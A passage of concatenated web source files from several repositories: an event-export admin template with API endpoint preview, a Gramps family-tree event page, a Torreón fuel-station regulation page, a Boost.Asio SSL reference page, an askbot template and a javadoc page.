src="doxygen.png" alt="doxygen"/> </a> 1.8.10 </small></address> </body> </html>
app/templates/gentelella/admin/event/export/export.html
gaeun/open-event-orga-server
{% extends 'gentelella/admin/event/event_base.html' %} {% block title %} {{ event.name }} - {{ _("Export") }} {% endblock %} {% set active_page = "export" %} {% block head_css %} {{ super() }} <style type="text/css"> .checkbox > label { margin-left: 0; margin-right: 0; display: inline-block; } .checkbox > .checkbox-label { position: absolute; top: 5px; left: 58px; font-size: 15px; font-weight: 300; text-transform: uppercase; } .string { color: green; } .number { color: darkorange; } .boolean { color: blue; } .null { color: magenta; } .key { color: red; } #export_creator { opacity: 0.8; } #export_creator_email { font-weight: 600; } #json-response { max-height: 650px; } </style> {% endblock %} {% block content %} <div class="row"> <div class="col-md-5 col-md-push-1"> <h3 style="font-weight: 300;">{{ _("Export and Download Event as zip") }}</h3> <h4 style="font-weight: 300;">{{ _("Select which media files you want in the zip") }}</h4> <form id="exportForm" style="margin-top:20px;"> <div class="checkbox"> <input type="checkbox" class="toggle-switch" name="image" id="image"> <label for="image"></label> <span class="checkbox-label">{{ _("Image") }}</span> </div> <div class="checkbox"> <input type="checkbox" class="toggle-switch" name="video" id="video"> <label for="video"></label> <span class="checkbox-label">{{ _("Video") }}</span> </div> <div class="checkbox"> <input type="checkbox" class="toggle-switch" name="audio" id="audio"> <label for="audio"></label> <span class="checkbox-label">{{ _("Audio") }}</span> </div> <div class="checkbox"> <input type="checkbox" class="toggle-switch" name="document" id="document"> <label for="document"></label> <span class="checkbox-label">{{ _("Document") }}</span> </div> </form> <br> <div class="btn-group"> <button type="button" class="btn btn-primary" id="btnStartExport" onclick="exportEvent({{ event.id }}, '{{ current_user.email }}')" style="margin-bottom: 0px; margin-right: 10px;" disabled="disabled">{{ _("Start") }} </button> <button type="button" class="btn btn-default" id="btnExportEvent" disabled="disabled">{{ _("Download") }}</button> </div> <br><br> <span id="export_status"></span><br> <span id="export_creator" style="display: none;">{{ _("Started by") }} <span id="export_creator_email">user_email</span>, <span id="export_creator_datetime">{{ _("datetime") }}</span> </span> <hr> <h3 style="font-weight: 300;">Download Event as Pentabarf XML</h3> Once the event is live and the schedule is published, pentabarf XML version of the schedule will be available at:<br><br> <pre><code>{{ url_for('event_detail.display_event_schedule_pentabarf', identifier=event.identifier, _external=True) }}</code></pre> Alternatively, you can download the pentabarf XML here<br><br> <a href="{{ url_for('.pentabarf_export_view', event_id=event.id) }}" class="btn btn-info">Download pentabarf.xml</a> <hr> <h3 style="font-weight: 300;">Download Event as iCalendar</h3> Once the event is live and the schedule is published, iCalendar version of the event will be available at:<br><br> <pre><code>{{ url_for('event_detail.display_event_schedule_ical', identifier=event.identifier, _external=True) }}</code></pre> Alternatively, you can download the iCalendar here<br><br> <a href="{{ url_for('.ical_export_view', event_id=event.id) }}" class="btn btn-info">Download calendar.ics</a> <hr> <h3 style="font-weight: 300;">Download Event as iCalendar XML (xCal)</h3> Once the event is live and the schedule is published, iCalendar version of the event will be available at:<br><br> <pre><code>{{ url_for('event_detail.display_event_schedule_xcal', identifier=event.identifier, _external=True) }}</code></pre> Alternatively, you can download the iCalendar XML (xCal) here<br><br> <a href="{{ url_for('.xcal_export_view', event_id=event.id) }}" class="btn btn-info">Download calendar.xcs</a> </div> <div class="col-md-5 col-md-push-1"> <h3 style="font-weight: 300;">{{ _("Access event information via REST API") }}</h3> <form style="margin-top:20px;" id="api-form"> <div class="checkbox"> <input type="checkbox" class="toggle-switch" name="basic_event_details" id="basic_event_details" checked disabled> <label for="basic_event_details"></label> <span class="checkbox-label">{{ _("Basic Event Details") }}</span> </div> <div class="checkbox"> <input type="checkbox" class="toggle-switch" name="event_sessions" id="event_sessions"> <label for="event_sessions"></label> <span class="checkbox-label">{{ _("Sessions") }}</span> </div> <div class="checkbox"> <input type="checkbox" class="toggle-switch" name="event_microlocations" id="event_microlocations"> <label for="event_microlocations"></label> <span class="checkbox-label">{{ _("Microlocations") }}</span> </div> <div class="checkbox"> <input type="checkbox" class="toggle-switch" name="event_tracks" id="event_tracks"> <label for="event_tracks"></label> <span class="checkbox-label">{{ _("Tracks") }}</span> </div> <div class="checkbox"> <input type="checkbox" class="toggle-switch" name="event_speakers" id="event_speakers"> <label for="event_speakers"></label> <span class="checkbox-label">{{ _("Speakers") }}</span> </div> <div class="checkbox"> <input type="checkbox" class="toggle-switch" name="event_sponsors" id="event_sponsors"> <label for="event_sponsors"></label> <span class="checkbox-label">{{ _("Sponsors") }}</span> </div> <div class="checkbox"> <input type="checkbox" class="toggle-switch" name="event_tickets" id="event_tickets"> <label for="event_tickets"></label> <span class="checkbox-label">{{ _("Tickets") }}</span> </div> </form> <br> <p>{{ _("You can make a") }} <code>GET</code> {{ _("request to the following endpoint to access the selected information") }}</p> <pre><code id="endpoint-url-holder" data-event-id="{{ event.id }}"></code></pre> <br> <h4>{{ _("Response") }}</h4> <pre id="json-response"></pre> </div> </div> {% endblock %} {% block tail_js %} {{ super() }} <script src="{{ url_for('static', filename='js/admin/event/exportEvent.js') }}"></script> <script type="text/javascript"> function syntaxHighlight(json) { json = json.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;'); return json.replace(/("(\\u[a-zA-Z0-9]{4}|\\[^u]|[^\\"])*"(\s*:)?|\b(true|false|null)\b|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?)/g, function (match) { var cls = 'number'; if (/^"/.test(match)) { if (/:$/.test(match)) { cls = 'key'; } else { cls = 'string'; } } else if (/true|false/.test(match)) { cls = 'boolean'; } else if (/null/.test(match)) { cls = 'null'; } return '<span class="' + cls + '">' + match + '</span>'; }); } $(function () { var $apiCheckboxes = $("#api-form").find("input[type=checkbox]"); var $endpointUrlHolder = $("#endpoint-url-holder"); var eventId = $endpointUrlHolder.data('event-id'); $apiCheckboxes.change(function () { var includes = []; $.each($apiCheckboxes, function (key, $apiCheckbox) { $apiCheckbox = $($apiCheckbox); var name = $apiCheckbox.attr('name'); if (name != 'basic_event_details' && $apiCheckbox[0].checked) { includes.push(name.replace("event_", "")); } }); var oldText = $endpointUrlHolder.text(); if (includes.length > 0) { includes = includes.join(','); var url = location.protocol + "//" + location.host + "/api/v1/events/" + eventId + "?include=" + includes; $endpointUrlHolder.text(url); } else { $endpointUrlHolder.text(location.protocol + "//" + location.host + "/api/v1/events/" + eventId); } if ($endpointUrlHolder.text() != oldText) { reloadSample($endpointUrlHolder.text()); } }); $apiCheckboxes.trigger('change'); }); function reloadSample(url) { $.getJSON(url, function (data) { var str = JSON.stringify(data, undefined, 4); $("#json-response").html(syntaxHighlight(str)); }); } loadPreviousJob( task_url = "{{ export_jobs.task }}", user_email = "{{ export_jobs.user_email }}", start_time = "{{ export_jobs.start_time | humanize_alt }}" ); </script> {% endblock %}
RossFamilyTree/evt/4/8/d15f6026ac3768248a5b0c1a84.html
RossGammon/the-gammons.net
<!DOCTYPE html> <html xml:lang="en-GB" lang="en-GB" xmlns="http://www.w3.org/1999/xhtml"> <head lang="en-GB"> <title>Ross Gammon’s Family Tree - Events</title> <meta charset="UTF-8" /> <meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" /> <meta name ="apple-mobile-web-app-capable" content="yes" /> <meta name="generator" content="Gramps 4.2.8 http://gramps-project.org/" /> <meta name="author" content="" /> <link href="../../../images/favicon2.ico" rel="shortcut icon" type="image/x-icon" /> <link href="../../../css/narrative-screen.css" media="screen" rel="stylesheet" type="text/css" /> <link href="../../../css/narrative-print.css" media="print" rel="stylesheet" type="text/css" /> </head> <body> <div id="header"> <h1 id="SiteTitle">Ross Gammon’s Family Tree</h1> </div> <div class="wrapper" id="nav" role="navigation"> <div class="container"> <ul class="menu" id="dropmenu"> <li><a href="../../../individuals.html" title="Individuals">Individuals</a></li> <li><a href="../../../index.html" title="Surnames">Surnames</a></li> <li><a href="../../../families.html" title="Families">Families</a></li> <li class = "CurrentSection"><a href="../../../events.html" title="Events">Events</a></li> <li><a href="../../../places.html" title="Places">Places</a></li> <li><a href="../../../sources.html" title="Sources">Sources</a></li> <li><a href="../../../repositories.html" title="Repositories">Repositories</a></li> <li><a href="../../../media.html" title="Media">Media</a></li> <li><a href="../../../thumbnails.html" title="Thumbnails">Thumbnails</a></li> </ul> </div> </div> <div class="content" id="EventDetail"> <h3>Birth</h3> <table class="infolist eventlist"> <tbody> <tr> <td class="ColumnAttribute">Gramps ID</td> <td class="ColumnGRAMPSID">E9976</td> </tr> <tr> <td class="ColumnAttribute">Date</td> <td class="ColumnColumnDate"> 1870-07-01 </td> </tr> <tr> <td class="ColumnAttribute">Place</td> <td class="ColumnColumnPlace"> <a href="../../../plc/c/4/d15f5fb92e843882bcabe3e6e4c.html" title=""> </a> </td> </tr> </tbody> </table> <div class="subsection" id="references"> <h4>References</h4> <ol class="Col1" role="Volume-n-Page"type = 1> <li> <a href="../../../ppl/b/9/d15f6026ab966ee08e119b98b9b.html"> WALTERS, Ada <span class="grampsid"> [I9108]</span> </a> </li> </ol> </div> </div> <div class="fullclear"></div> <div id="footer"> <p id="createdate"> Generated by <a href="http://gramps-project.org/">Gramps</a> 4.2.8<br />Last change was the 2015-08-05 19:54:42<br />Created for <a href="../../../ppl/9/e/d15f5fb48902c4fc1b421d249e9.html">GAMMON, Francis</a> </p> <p id="copyright"> </p> </div> </body> </html>
reglamentos-vigentes/reglamento-gasolineras-gasolinas-diesel-gas-licuado.html
normatividadtorreon/normatividadtorreon.github.io
<!DOCTYPE html> <html lang="es"> <head> <meta charset="utf-8"> <!-- ========================================================================================== Sistema de Normatividad Municipal 3er. generación de la Plataforma del Conocimiento Desarrollado por Ing. Guillermo Valdés Lozano <guivaloz en movimientolibre.com> El software que lo construye está bajo la licencia GPL versión 3. © 2014, 2015, 2016, 2017. Una copia está contenida en el archivo LICENCE al bajar desde GitHub. Descargue, estudie y colabore bajando todo este sitio web: GitHub https://github.com/normatividadtorreon/normatividadtorreon.github.io Agradecemos y compartimos las tecnologías abiertas y gratuitas sobre las que se basa: PHP http://php.net Twitter Bootstrap http://getbootstrap.com StartBootStrap http://startbootstrap.com Morris.js https://morrisjs.github.io/morris.js/ Font Awesome http://fontawesome.io DataTables https://www.datatables.net GitHub https://github.com Evolvere iconos http://github.com/franksouza183/EvolvereSuit ========================================================================================== --> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Las disposiciones de este Reglamento son de orden público e interés social y su observancia es general y obligatoria dentro del Municipio de Torreón, Coah, y tienen por objeto regular el establecimiento de gasolineras y estaciones de almacenamiento, distribución y venta de Gas Licuado de Petróleo en su territorio, así como lo concerniente al lugar de su ubicación, licencia de construcción, o remodelación y demás aspectos relacionados de competencia municipal, quedando sujetos al presente reglamento, los proyectos y obras de construcción, remodelaciones y adecuaciones de las estaciones de servicio, gasolineras existentes, así como las que se pretendan localizar en el territorio quedando exceptuadas las ya existentes de la distancia de ubicación entre una y otra."> <meta name="author" content="Dirección de Desarrollo Institucional"> <meta name="keywords" content="Reglamento, Vigente, Gasolineras, Gasolina, Diesel, Gas Licuado"> <title>Reglamento para el establecimiento de gasolineras y estaciones de venta, almacenamiento de gasolinas, diesel y plantas de almacenamiento para distribución y venta de gas licuado de petróleo del Municipio de Torreón - Sistema de Normatividad Municipal</title> <link rel="shortcut icon" type="image/x-icon" href="../favicon.ico"> <link rel="apple-touch-icon" href="../imagenes/apple-touch-icon.png"> <link rel="apple-touch-icon" href="../imagenes/apple-touch-icon-76x76.png" sizes="76x76"> <link rel="apple-touch-icon" href="../imagenes/apple-touch-icon-120x120.png" sizes="120x120"> <link rel="apple-touch-icon" href="../imagenes/apple-touch-icon-152x152.png" sizes="152x152"> <link rel="apple-touch-icon" href="../imagenes/apple-touch-icon-180x180.png" sizes="180x180"> <link rel="icon" href="../imagenes/icon-hires.png" sizes="192x192"> <link rel="icon" href="../imagenes/icon-normal.png" sizes="128x128"> <link rel="alternate" type="application/rss+xml" href="../rss.xml" title="Sistema de Normatividad Municipal"> <link rel="stylesheet" type="text/css" href="../vendor/bootstrap/css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="../vendor/metisMenu/metisMenu.min.css"> <link rel="stylesheet" type="text/css" href="../vendor/font-awesome/css/font-awesome.min.css"> <link rel="stylesheet" type="text/css" href="../dist/css/sb-admin-2.min.css"> <link rel="stylesheet" type="text/css" href="../dist/css/plataforma-de-conocimiento.css"> <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Droid+Sans:400,700"> <link rel="stylesheet" type="text/css" href="../dist/css/normatividad-torreon.css"> <!-- SOPORTE PARA IE --> <!--[if lt IE 9]> <script type="text/javascript" src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script type="text/javascript" src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script> <![endif]--> </head> <body> <div id="wrapper"> <nav class="navbar navbar-default navbar-static-top" role="navigation" style="margin-bottom: 0"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="../index.html">Sistema de Normatividad Municipal</a> </div> <div class="navbar-default sidebar" role="navigation"> <div class="sidebar-nav navbar-collapse"> <ul class="nav" id="side-menu"> <li class="sidebar-search"> <form method="get" id="" action="http://www.normatividadtorreon.gob.mx/buscador-resultados.html"> <input type="hidden" value="" name="cx"> <input type="hidden" value="FORID:11" name="cof"> <div class="input-group custom-search-form"> <input type="text" class="form-control" placeholder="Buscar..." value="" name="s" id="s"> <span class="input-group-btn"> <button class="btn btn-default" type="submit" id="searchsubmit"><i class="fa fa-search"></i></button> </span> </div> </form> </li> <li><a href="../manuales-de-organizacion/index.html"><span class="navegacion-icono"><i class="fa fa-files-o"></i></span> Manuales de Organización</a></li> <li><a href="../reglamentos-vigentes/index.html"><span class="navegacion-icono"><i class="fa fa-files-o"></i></span> Reglamentos Vigentes</a></li> <li><a href="../reglamentos-abrogados/index.html"><span class="navegacion-icono"><i class="fa fa-files-o"></i></span> Reglamentos Abrogados</a></li> </ul> </div> </div> </nav> <div id="page-wrapper"> <div class="cuerpo"> <article><div itemscope itemtype="http://schema.org/Article"> <div class="encabezado"> <h1 itemprop="headline">Reglamento para el establecimiento de gasolineras y estaciones de venta, almacenamiento de gasolinas, diesel y plantas de almacenamiento para distribución y venta de gas licuado de petróleo del Municipio de Torreón</h1> <div class="encabezado-descripcion" itemprop="description">Las disposiciones de este Reglamento son de orden público e interés social y su observancia es general y obligatoria dentro del Municipio de Torreón, Coah, y tienen por objeto regular el establecimiento de gasolineras y estaciones de almacenamiento, distribución y venta de Gas Licuado de Petróleo en su territorio, así como lo concerniente al lugar de su ubicación, licencia de construcción, o remodelación y demás aspectos relacionados de competencia municipal, quedando sujetos al presente reglamento, los proyectos y obras de construcción, remodelaciones y adecuaciones de las estaciones de servicio, gasolineras existentes, así como las que se pretendan localizar en el territorio quedando exceptuadas las ya existentes de la distancia de ubicación entre una y otra.</div> <div class="encabezado-autor-fecha"> Por <span itemprop="author">Dirección de Desarrollo Institucional</span> - <meta itemprop="datePublished" content="2013-01-01T00:00">01/01/2013 </div> </div> <div itemprop="articleBody"> <!-- Contenido: Inicia --> <h3>Descargar</h3> <p><a href="#"><img src="../imagenes/icono-word.png" alt="Descargar Word"></a> <a href="reglamento-gasolineras-gasolinas-diesel-gas-licuado.pdf"><img src="../imagenes/icono-pdf.png" alt="Descargar PDF"></a></p> <!-- Contenido: Termina --> </div> <div class="publicador" itemprop="publisher" itemscope itemtype="http://schema.org/Organization"> <h3 class="titulo" itemprop="name">Sistema de Normatividad Municipal</h3> <div class="descripcion" itemprop="description">Dirección General de Desarrollo Institucional del Republicano Ayuntamiento de Torreón.</div> <div class="contenido-imagen-previa-final"></div> </div> </div></article> </div> <div class="mapa-inferior"> <div class="row"> <div class="col-md-8"> <a href="../index.html">Inicio</a> | <a href="../manuales-de-organizacion/index.html"> Manuales de Organización</a> | <a href="../reglamentos-abrogados/index.html"> Reglamentos Abrogados</a> | <a href="../reglamentos-vigentes/index.html"> Reglamentos Vigentes</a> </div> <div class="col-md-4"> <div class="pull-right redes-sociales"> <a class="fa fa-twitter-square" href="https://twitter.com/DGDITRC" target="_blank"></a> <a class="fa fa-github-square" href="https://github.com/normatividadtorreon" target="_blank"></a> <a class="fa fa-rss-square" href="../rss.xml"></a> </div> </div> </div> </div> </div> </div> <!-- Javascript global inicia --> <script type="text/javascript" src="../vendor/jquery/jquery.min.js"></script> <script type="text/javascript" src="../vendor/bootstrap/js/bootstrap.min.js"></script> <script type="text/javascript" src="../vendor/metisMenu/metisMenu.min.js"></script> <script type="text/javascript" src="../dist/js/sb-admin-2.min.js"></script> <!-- Javascript global termina --> <!-- Javascript inicia --> <!-- Javascript termina --> </body> </html>
dependencies/boost-1.46.0/doc/html/boost_asio/reference/ssl__context_service/set_verify_mode.html
gorkinovich/DefendersOfMankind
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"> <title>ssl::context_service::set_verify_mode</title> <link rel="stylesheet" href="../../../../../doc/src/boostbook.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.76.1"> <link rel="home" href="../../../boost_asio.html" title="Boost.Asio"> <link rel="up" href="../ssl__context_service.html" title="ssl::context_service"> <link rel="prev" href="set_password_callback.html" title="ssl::context_service::set_password_callback"> <link rel="next" href="shutdown_service.html" title="ssl::context_service::shutdown_service"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table cellpadding="2" width="100%"><tr> <td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../boost.png"></td> <td align="center"><a href="../../../../../index.html">Home</a></td> <td align="center"><a href="../../../../../libs/libraries.htm">Libraries</a></td> <td align="center"><a href="http://www.boost.org/users/people.html">People</a></td> <td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td> <td align="center"><a href="../../../../../more/index.htm">More</a></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="set_password_callback.html"><img src="../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../ssl__context_service.html"><img src="../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../boost_asio.html"><img src="../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="shutdown_service.html"><img src="../../../../../doc/src/images/next.png" alt="Next"></a> </div> <div class="section"> <div class="titlepage"><div><div><h4 class="title"> <a name="boost_asio.reference.ssl__context_service.set_verify_mode"></a><a class="link" href="set_verify_mode.html" title="ssl::context_service::set_verify_mode">ssl::context_service::set_verify_mode</a> </h4></div></div></div> <p> <a class="indexterm" name="id1348379"></a> Set peer verification mode. </p> <pre class="programlisting"><span class="identifier">boost</span><span class="special">::</span><span class="identifier">system</span><span class="special">::</span><span class="identifier">error_code</span> <span class="identifier">set_verify_mode</span><span class="special">(</span> <span class="identifier">impl_type</span> <span class="special">&amp;</span> <span class="identifier">impl</span><span class="special">,</span> <span class="identifier">context_base</span><span class="special">::</span><span class="identifier">verify_mode</span> <span class="identifier">v</span><span class="special">,</span> <span class="identifier">boost</span><span class="special">::</span><span class="identifier">system</span><span class="special">::</span><span class="identifier">error_code</span> <span class="special">&amp;</span> <span class="identifier">ec</span><span class="special">);</span> </pre> </div> <table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr> <td align="left"></td> <td align="right"><div class="copyright-footer">Copyright &#169; 2003 - 2010 Christopher M. Kohlhoff<p> Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>) </p> </div></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="set_password_callback.html"><img src="../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../ssl__context_service.html"><img src="../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../boost_asio.html"><img src="../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="shutdown_service.html"><img src="../../../../../doc/src/images/next.png" alt="Next"></a> </div> </body> </html>
askbot/skins/default/templates/main_page/questions_loop.html
samhoo/askbot-realworld
{% import "macros.html" as macros %} {% cache 0 "questions" questions search_tags scope sort query context.page context.page_size language_code %} {% for question in questions.object_list %} {{macros.question_summary(question)}} {% endfor %} {% endcache %} {# comment todo: fix css here #} {% if questions_count == 0 %} {% include "main_page/nothing_found.html" %} {% else %} <div class="evenMore"> {% trans %}Did not find what you were looking for?{% endtrans %} <a href="{% url ask %}">{% trans %}Please, post your question!{% endtrans %}</a> </div> {% endif %}
doc/net/bican/wordpress/class-use/MediaObject.html
cameronbraid/wordpress-java
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_26) on Thu Aug 25 10:57:50 EEST 2011 --> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE> Uses of Class net.bican.wordpress.MediaObject (jwordpress 0.4.1 API) </TITLE> <META NAME="date" CONTENT="2011-08-25"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class net.bican.wordpress.MediaObject (jwordpress 0.4.1 API)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../net/bican/wordpress/MediaObject.html" title="class in net.bican.wordpress"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../index.html?net/bican/wordpress//class-useMediaObject.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="MediaObject.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <CENTER> <H2> <B>Uses of Class<br>net.bican.wordpress.MediaObject</B></H2> </CENTER> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Packages that use <A HREF="../../../../net/bican/wordpress/MediaObject.html" title="class in net.bican.wordpress">MediaObject</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#net.bican.wordpress"><B>net.bican.wordpress</B></A></TD> <TD>&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <A NAME="net.bican.wordpress"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Uses of <A HREF="../../../../net/bican/wordpress/MediaObject.html" title="class in net.bican.wordpress">MediaObject</A> in <A HREF="../../../../net/bican/wordpress/package-summary.html">net.bican.wordpress</A></FONT></TH> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left" COLSPAN="2">Methods in <A HREF="../../../../net/bican/wordpress/package-summary.html">net.bican.wordpress</A> that return <A HREF="../../../../net/bican/wordpress/MediaObject.html" title="class in net.bican.wordpress">MediaObject</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;<A HREF="../../../../net/bican/wordpress/MediaObject.html" title="class in net.bican.wordpress">MediaObject</A></CODE></FONT></TD> <TD><CODE><B>Wordpress.</B><B><A HREF="../../../../net/bican/wordpress/Wordpress.html#newMediaObject(java.lang.String, java.io.File, java.lang.Boolean)">newMediaObject</A></B>(<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A>&nbsp;mimeType, <A HREF="http://download.oracle.com/javase/6/docs/api/java/io/File.html?is-external=true" title="class or interface in java.io">File</A>&nbsp;file, <A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/Boolean.html?is-external=true" title="class or interface in java.lang">Boolean</A>&nbsp;overwrite)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../net/bican/wordpress/MediaObject.html" title="class in net.bican.wordpress"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> 